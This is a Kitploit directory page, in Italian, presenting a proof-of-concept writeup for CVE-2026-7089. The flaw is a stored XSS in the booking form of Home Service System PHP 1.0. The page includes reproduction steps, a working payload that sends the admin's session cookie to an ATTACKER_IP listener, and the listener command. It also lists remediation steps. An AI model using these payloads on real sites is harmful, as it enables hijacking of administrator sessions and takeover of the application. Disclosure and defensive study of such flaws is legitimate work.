Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-7089-XSS — Proof-of-concept per CVE-2026-7089, una XSS persistente in Home Service System PHP 1.0 che consente il dirottamento della sessione admin non autenticato tramite il modulo di prenotazione. | Kitploit
Strumenti/GitHubGitHub/xmyronn/cve-2026-7089-xss
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubxmyronn/cve-2026-7089-xss

CVE-2026-7089-XSS

Proof-of-concept per CVE-2026-7089, una XSS persistente in Home Service System PHP 1.0 che consente il dirottamento della sessione admin non autenticato tramite il modulo di prenotazione.

Vedi Repository
106 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

home-service-system-unauth-stored-xss-admin-takeover

Dettagli della Vulnerabilità

CampoDettagli
Vendorcode-projects.org
ProdottoHome Service System In PHP
Versione1.0
Tipo di VulnerabilitàCross-Site Scripting (XSS) Memorizzato
CWECWE-79
Autenticazione RichiestaNo
AutoreImad Alvi

Descrizione

Una vulnerabilità di Cross-Site Scripting (XSS) Memorizzato esiste nel file booking.php di Home Service System In PHP 1.0. Utenti non autenticati possono iniettare payload JavaScript malevoli tramite i campi del modulo di prenotazione. L'input non sanificato viene memorizzato nel database e renderizzato senza codifica di output nel pannello di amministrazione (admin.php), dove viene eseguito nel contesto del browser dell'amministratore.

Ciò consente a un attaccante non autenticato di rubare il cookie di sessione dell'amministratore, eseguire azioni per conto dell'amministratore o compromettere completamente l'account admin.


Componente Interessato

  • File: booking.php
  • Parametri: fname, lname
  • Sink: admin.php → Gestione Prenotazioni

Passaggi per la Riproduzione

  1. Naviga alla pagina di prenotazione come utente non autenticato: http://TARGET/homeservices/booking.php?provider=

    Screenshot 2026-04-08 221145
  2. Nel campo Nome, inietta il seguente payload:

<script>new Image().src="http://ATTACKER_IP:PORT?c="+document.cookie</script>
  1. Compila i campi rimanenti con dati validi e invia la prenotazione.

  2. Avvia un listener sulla tua macchina attaccante:

php -S 0.0.0.0:PORT
  1. Attendi che l'amministratore visiti la sezione Gestione Prenotazioni in admin.php.

  2. Il payload viene eseguito nel browser dell'amministratore, esfiltrando il cookie di sessione al tuo listener.

    Screenshot 2026-04-08 221158
Screenshot 2026-04-08 221214

Proof of Concept

Payload (Alert)

<script>alert(1)</script>
Screenshot 2026-04-08 220538

Payload (Dirottamento Sessione)

<script>new Image().src="http://ATTACKER_IP:7979?c="+document.cookie</script>

Impatto

Questa vulnerabilità consente a un attaccante remoto non autenticato di compromettere completamente l'applicazione.

Un attaccante può:

  • Eseguire JavaScript arbitrario nel browser dell'amministratore
  • Rubare il cookie di sessione PHPSESSID dell'amministratore
  • Dirottare la sessione dell'amministratore e ottenere pieno accesso amministrativo
  • Eseguire qualsiasi azione amministrativa (gestire prenotazioni, fornitori, ecc.)

Ciò comporta la compromissione completa dell'applicazione.

Rimedio

  • Applicare htmlspecialchars() con ENT_QUOTES su tutti gli input forniti dall'utente prima di memorizzarli o renderizzarli
  • Implementare un'intestazione Content Security Policy (CSP)
  • Validare e sanificare tutti gli input dei moduli lato server

Riferimenti

  • Home Service System In PHP - code-projects.org
Scarica lo strumento